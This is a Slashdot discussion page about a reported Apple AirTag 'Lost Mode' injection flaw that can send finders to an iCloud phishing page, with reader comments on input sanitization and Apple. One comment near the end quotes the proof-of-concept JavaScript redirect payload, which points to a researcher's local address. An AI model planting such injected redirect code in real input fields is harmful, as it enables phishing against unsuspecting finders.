Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Security Apple

Apple AirTag Bug Enables 'Good Samaritan' Attack (krebsonsecurity.com) 29

An anonymous reader quotes a report from Krebs On Security: The new $30 AirTag tracking device from Apple has a feature that allows anyone who finds one of these tiny location beacons to scan it with a mobile phone and discover its owner's phone number if the AirTag has been set to lost mode. But according to new research, this same feature can be abused to redirect the Good Samaritan to an iCloud phishing page -- or to any other malicious website. The AirTag's "Lost Mode" lets users alert Apple when an AirTag is missing. Setting it to Lost Mode generates a unique URL at https://found.apple.com/ and allows the user to enter a personal message and contact phone number. Anyone who finds the AirTag and scans it with an Apple or Android phone will immediately see that unique Apple URL with the owner's message.

When scanned, an AirTag in Lost Mode will present a short message asking the finder to call the owner at at their specified phone number. This information pops up without asking the finder to log in or provide any personal information. But your average Good Samaritan might not know this. That's important because Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field -- such as code that causes the Good Samaritan's device to visit a phony Apple iCloud login page. The vulnerability was discovered and reported to Apple by Bobby Rauch, a security consultant and penetration tester based in Boston. Rauch told KrebsOnSecurity the AirTag weakness makes the devices cheap and possibly very effective physical trojan horses.

This discussion has been archived. No new comments can be posted.

Apple AirTag Bug Enables 'Good Samaritan' Attack

Comments Filter:
  • "Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field"

    That's just shamefully pathetic and sloppy and stupid.

    Even my crap-ass code wouldn't allow that.

    • "Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field"

      That's just shamefully pathetic and sloppy and stupid.

      Even my crap-ass code wouldn't allow that.

      Clearly the problem is Apple isn't paying their programmers enough money. When you go cheap, this is what happens.

    • "Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field"

      That's just shamefully pathetic and sloppy and stupid.

      Even my crap-ass code wouldn't allow that.

      So you think it isn't just as stupid for the recipient's phone not to sanitize input data?

      • So you think it isn't just as stupid for the recipient's phone not to sanitize input data?

        No, I think it's stupid that the app the developers wrote didn't screen for that.

        As for the phone, I don't know if it has enough brains to determine when a field should only take numbers. Mine doesn't. I can go to lots of forms on the web and enter all kinds of shit into all sorts of fields. Unless the developer restricts what goes in there, I don't see how my phone would know or be responsible.

        Should your PC's keyboard restrict what you type into a field? No, and a phone is no different. Your phone doesn't

        • So you think it isn't just as stupid for the recipient's phone not to sanitize input data?

          No, I think it's stupid that the app the developers wrote didn't screen for that.

          As for the phone, I don't know if it has enough brains to determine when a field should only take numbers. Mine doesn't. I can go to lots of forms on the web and enter all kinds of shit into all sorts of fields. Unless the developer restricts what goes in there, I don't see how my phone would know or be responsible.

          Should your PC's keyboard restrict what you type into a field? No, and a phone is no different. Your phone doesn't know what kind of field you're entering stuff into, so why would it restrict what you enter?

          In short, it's not the phone's fault per se, since they're using an app it's really on the shoulders of the app developer.

          Ok, I'll give you that. The code processing the web-form should be sanitizing the input for that Text Field.

  • and don’t scan any AirTags either.

    • More like donâ(TM)t log into iCloud login pages that are not on apple.com or iCloud.com. Check the URL. Hint: keychain will enable you to auto-enter the password into the correct page. If suspicious, check the cert.
    • But it was so hard to resist that one I found in a parking lot labeled “Bitcoin wallet”! Next you’ll be telling me I shouldn’t have opened those e-mails from the prince of Nigeria, either.

    • by lazarus ( 2879 )

      Or scan any randomly-found QR codes?

  • by dgatwood ( 11270 ) on Wednesday September 29, 2021 @05:41PM (#61846179) Homepage Journal

    No good deed goes unpunished.

    • by AmiMoJo ( 196126 )

      AirTags are not a good dead, and this is another classic Apple fuck-up.

      The exploit is using the fact that Apple doesn't properly validate the input when you enter a phone number for the tag, and then doesn't properly validate the data from the tag when displaying it on your phone. So two failures to validate, which seems to be a common theme with Apple. Over the years we have seen them not rate limit iCloud password guesses, and multiple instances of iOS exploits using malformed web pages or SMS messages.

      As

      • by dgatwood ( 11270 )

        AirTags are not a good dead, and this is another classic Apple fuck-up.

        I meant returning them.

        Apple should have made them an open standard and got Google to implement support in Android so that at least anyone with a phone will be alerted if they are being covertly tracked. They managed to cooperate on COVID contact tracing using Bluetooth. But no, it's an Apple exclusive and only iPhones will warn you if you are being stalked.

        Apple shouldn't have bothered to sabotage the companies that already build very similar products, and should have instead just worked with them to create a shared iOS experience for all of their trackers that works better than those other manufacturers' apps, to make iOS better, rather than using their rather large market power to take over another market by force.

        Compared with that, Apple's almost unwavering failure to support open standards since S.J. died is a minor evil.

  • By the way, your new iPad looks delicious!
    Would you like some jelly to go with that?

  • They talk about putting "computer code" in the phone number field. What "computer code" ?! Is it HTML and JS? Is the client trying to render the contents of the field as HTML and interpret any potentially present JS?!
    Is Apple not sanitizing the input of the phone field ? Does anyone has a link with how this actually works ?
    • Yes, TFA has a link [medium.com] to the code used.

      It's this, wrapped in "script" tags (which I can't include because they trigger the ASCII art filter):

      window.location=’https://10.0.1.137:8000/indexer.html’;var a = ‘’;

Solutions are obvious if one only has the optical power to observe them over the horizon. -- K.A. Arsdall

Working...